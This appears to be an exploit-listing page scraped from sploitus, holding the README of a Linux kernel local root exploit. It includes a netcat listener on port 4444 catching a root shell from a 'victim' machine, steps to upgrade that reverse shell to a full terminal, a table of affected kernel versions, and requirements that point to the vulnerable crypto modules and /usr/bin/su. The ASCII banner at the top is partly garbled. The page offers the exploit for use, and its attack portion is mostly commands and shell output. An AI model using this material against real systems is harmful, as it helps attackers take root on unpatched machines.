Share
## https://sploitus.com/exploit?id=20851882-C949-5F96-940A-3AF7B9A460B4
```
____ _ _ ____ _
/ ___|___ _| | | | _ \ ___ ___ | |_
| | / _ \ | | | | |_) / _ \ / _ \| __|
| |__| (_) | | | | _ 4444
```
```
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
```
### TTY upgrade (attacker side, inside the shell)
```bash
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
```
---
## Affected Kernels
| From | To (exclusive) |
|------|----------------|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1โrc6 |
---
## Requirements
- **Python >= 3.10** (`os.splice()`)
- Read access to `/usr/bin/su` (world-readable on all distros)
- Kernel modules `algif_aead` and `authencesn` available
- No `sudo` required
---
## Author
**[danimrtzp](https://github.com/danimrtzp)**
---
## Disclaimer
For authorized security research and education only. Misuse is illegal.